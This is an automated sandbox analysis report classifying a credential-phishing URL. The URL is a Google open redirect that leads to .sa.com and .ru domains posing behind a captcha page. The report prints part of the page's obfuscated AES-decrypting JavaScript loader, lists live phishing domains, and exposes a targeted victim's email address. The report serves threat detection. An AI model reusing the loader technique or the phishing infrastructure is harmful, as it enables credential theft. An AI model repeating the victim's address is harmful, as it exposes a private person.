Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=sf_rand_string_mixed(5)FgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fir.nbaikp3.sa.com%2Fdelaw%2Flawn%2Fkoo%2Fsf_rand_string_mixed(24)/bill.wafford

Overview

General Information

Sample URL:https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=sf_rand_string_mixed(5)FgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIB
Analysis ID:1546697
Infos:

Detection

HTMLPhisher
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected HtmlPhish70
AI detected suspicious URL
Phishing site detected (based on shot match)
Detected suspicious crossdomain redirect
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
URL contains potential PII (phishing indication)
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

  • System is w10x64
  • chrome.exe (PID: 2148 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 5772 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1976,i,8441844483652794743,4114512088711831297,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6352 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=sf_rand_string_mixed(5)FgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fir.nbaikp3.sa.com%2Fdelaw%2Flawn%2Fkoo%2Fsf_rand_string_mixed(24)/bill.wafford@qurateretail.com" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
2.3.pages.csvJoeSecurity_HtmlPhish_70Yara detected HtmlPhish_70Joe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=sf_rand_string_mixed(5)FgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fir.nbaikp3.sa.com%2Fdelaw%2Flawn%2Fkoo%2Fsf_rand_string_mixed(24)/bill.wafford@qurateretail.comSlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering

    Phishing

    barindex
    Source: Yara matchFile source: 2.3.pages.csv, type: HTML
    Source: https://ecoutura.sa.com/9o93/#Mbill.wafford@qurateretail.comMatcher: Template: captcha matched
    Source: https://ecoutura.sa.com/9o93/#Mbill.wafford@qurateretail.comMatcher: Template: captcha matched
    Source: https://ecoutura.sa.com/9o93/#Mbill.wafford@qurateretail.comHTTP Parser: Number of links: 0
    Source: https://ecoutura.sa.com/9o93/#Mbill.wafford@qurateretail.comHTTP Parser: Base64 decoded: {"a":"5Oczbx08ibjgaIxoDaQj+mJMznYN4udZCSUgIaJBJ4k=","c":"209e7e0f4a7b7286821aacf220e833bd","b":"04211cf112b6b1911e821ff6a274a74e8077eb87b63afe3795698d138b4398d6825166389745f3f83ce4065b1031e307ba88aaf4ebcba7a6946990f5278cab39afd3511847d0955dd0f92c57be92e4a...
    Source: https://ecoutura.sa.com/9o93/#Mbill.wafford@qurateretail.comHTTP Parser: Title: Ultimate Supercar League - getplancgfe.ru does not match URL
    Source: https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=sf_rand_string_mixed(5)FgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fir.nbaikp3.sa.com%2Fdelaw%2Flawn%2Fkoo%2Fsf_rand_string_mixed(24)/bill.wafford@qurateretail.comSample URL: PII: bill.wafford@qurateretail.com
    Source: https://ecoutura.sa.com/9o93/#Mbill.wafford@qurateretail.comHTTP Parser: async function abandonment(keelhaul) { var{a,b,c,d} =json.parse(keelhaul); return cryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher:cryptojs.algo.sha512, keysize:64/8,iterations: 999}),{iv: cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8); } (async () => { document.write(awaitabandonment(await (await fetch(await abandonment(atob(`eyjhijoinu9jemj4mdhpympnyul4b0rhuworbupnem5ztjr1zfpdu1vnswfkqko0az0ilcjjijoimja5ztdlmgy0ytdinzi4njgymwfhy2yymjblodmzymqilcjiijoimdqymtfjzjexmmi2yje5mtflodixzmy2yti3nge3ngu4mdc3zwi4n2i2m2fmztm3otu2othkmtm4yjqzothknjgynte2njm4otc0nwyzzjgzy2u0mdy1yjewmzflmza3yme4ogfhzjrlymniytdhnjk0njk5mgy1mjc4y2fimzlhzmqzntexodq3zda5ntvkzdbmotjjntdiztkyztrhm2i2mgnjy2i0nzk3y2rjzde4zge1ogq3mgzmyzzlyzfhyjk1ndjmmjfjzdkznwezmzu5zmu0otawyjfkywi5nzhiztnmnjewyzzizjc2zmexmduzmjc5ywvhzjviytjknzc4mwewzjkwymjhmwe0mjaxogizyjdlmzhky2mwnzjjymy0nzm4zjyzntq5ymyxyjg4zdi1ztgzmddjowrhmzbhndixyjiwm2ezmmy1zwy3mmjhotlhymi5n...
    Source: https://ecoutura.sa.com/9o93/#Mbill.wafford@qurateretail.comHTTP Parser: No favicon
    Source: https://ecoutura.sa.com/9o93/#Mbill.wafford@qurateretail.comHTTP Parser: No favicon
    Source: https://ecoutura.sa.com/9o93/#Mbill.wafford@qurateretail.comHTTP Parser: No favicon
    Source: https://ecoutura.sa.com/9o93/#Mbill.wafford@qurateretail.comHTTP Parser: No <meta name="author".. found
    Source: https://ecoutura.sa.com/9o93/#Mbill.wafford@qurateretail.comHTTP Parser: No <meta name="copyright".. found
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49741 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49742 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49791 version: TLS 1.2
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: www.google.co.th to http://ir.nbaikp3.sa.com/delaw/lawn/koo/sf_rand_string_mixed(24)/bill.wafford@qurateretail.com
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=sf_rand_string_mixed(5)FgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fir.nbaikp3.sa.com%2Fdelaw%2Flawn%2Fkoo%2Fsf_rand_string_mixed(24)/bill.wafford@qurateretail.com HTTP/1.1Host: www.google.co.thConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCI/KzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /amp/ir.nbaikp3.sa.com/delaw/lawn/koo/sf_rand_string_mixed(24)/bill.wafford@qurateretail.com HTTP/1.1Host: www.google.co.thConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCI/KzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=518=FNavcWl5dt1vJ4q5ZzYroABSFK_8ybUnNjh5Eoxbg7pzW6d9Abx_sqiF0d2J4MVs3c-bXX-DOtqCS-tBElxvBp1Cc-JiaiPH0HgDLCLYJzQ0bPSTFQZJjZb7zIdOOr0YWCUUtIoqZi9oStsxpqiinbrc0aYxhHWCjOZxgAjHu7ekpssBfgZyrWGoFkLylJfe
    Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
    Source: global trafficHTTP traffic detected: GET /9o93/ HTTP/1.1Host: ecoutura.sa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: http://ir.nbaikp3.sa.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ecoutura.sa.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/22755d9a86c9/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ecoutura.sa.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/ndzua/0x4AAAAAAAymN2-m7RRX_jxe/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://ecoutura.sa.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/22755d9a86c9/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8dbbfc65ff9e6b31&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/ndzua/0x4AAAAAAAymN2-m7RRX_jxe/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/ndzua/0x4AAAAAAAymN2-m7RRX_jxe/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: ecoutura.sa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ecoutura.sa.com/9o93/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=b9tlets4pfikfq68tperuik8h3
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8dbbfc65ff9e6b31&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1024805803:1730463054:b1rgIEdpWeHxmQJHck6RV8EmMMFOLeJcpMeBvebYgsc/8dbbfc65ff9e6b31/YskjOMlt.092AVHG.UE3lCUdd4zGhRJt1uSalhQrUMU-1730465168-1.1.1.1-yGD2l9ovY9dDpnf_eBS_OXrkjwGpYqg3WZZgwfmyKhkt414YGGj1tgkl1n9lqZ89 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8dbbfc65ff9e6b31/1730465170458/acbb53e218aec4a036a5867779de4914a70d4321a24be75c0101110a335ab166/FGnjkYIDdV7w3fL HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/ndzua/0x4AAAAAAAymN2-m7RRX_jxe/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8dbbfc65ff9e6b31/1730465170459/bzBIJqatPd8Kn9g HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/ndzua/0x4AAAAAAAymN2-m7RRX_jxe/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8dbbfc65ff9e6b31/1730465170459/bzBIJqatPd8Kn9g HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1024805803:1730463054:b1rgIEdpWeHxmQJHck6RV8EmMMFOLeJcpMeBvebYgsc/8dbbfc65ff9e6b31/YskjOMlt.092AVHG.UE3lCUdd4zGhRJt1uSalhQrUMU-1730465168-1.1.1.1-yGD2l9ovY9dDpnf_eBS_OXrkjwGpYqg3WZZgwfmyKhkt414YGGj1tgkl1n9lqZ89 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1024805803:1730463054:b1rgIEdpWeHxmQJHck6RV8EmMMFOLeJcpMeBvebYgsc/8dbbfc65ff9e6b31/YskjOMlt.092AVHG.UE3lCUdd4zGhRJt1uSalhQrUMU-1730465168-1.1.1.1-yGD2l9ovY9dDpnf_eBS_OXrkjwGpYqg3WZZgwfmyKhkt414YGGj1tgkl1n9lqZ89 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ecoutura.sa.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.5.0/css/all.min.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://ecoutura.sa.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /npm/bootstrap@5.3.0/dist/css/bootstrap.min.css HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://ecoutura.sa.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET // HTTP/1.1Host: getplancgfe.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
